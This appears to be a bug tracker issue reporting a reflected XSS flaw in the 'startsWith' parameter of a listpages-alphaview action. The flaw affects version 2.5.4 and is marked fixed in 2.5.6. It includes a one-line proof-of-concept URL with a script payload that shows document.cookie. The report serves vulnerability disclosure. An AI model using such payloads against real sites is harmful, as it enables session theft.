XSS vulnerability in app/pages/listpages-alphaview.action

XMLWordPrintable

    • Type: Bug
    • Resolution: Fixed
    • Priority: High
    • 2.5.6
    • Affects Version/s: 2.5.4
    • Component/s: None
    • Environment:

      Standalone

      Description:
      XSS via the "startsWith" field in pages/listpages-alphaview.action.

      Exploit:

      http://app/pages/listpages-alphaview.action?key=&startsWith=xss:<script>alert(document.cookie)</script>

              Assignee:
              Unassigned
              Reporter:
              Gergely Hodicska
              Votes:
              2 Vote for this issue
              Watchers:
              2 Start watching this issue

                Created:
                Updated:
                Resolved: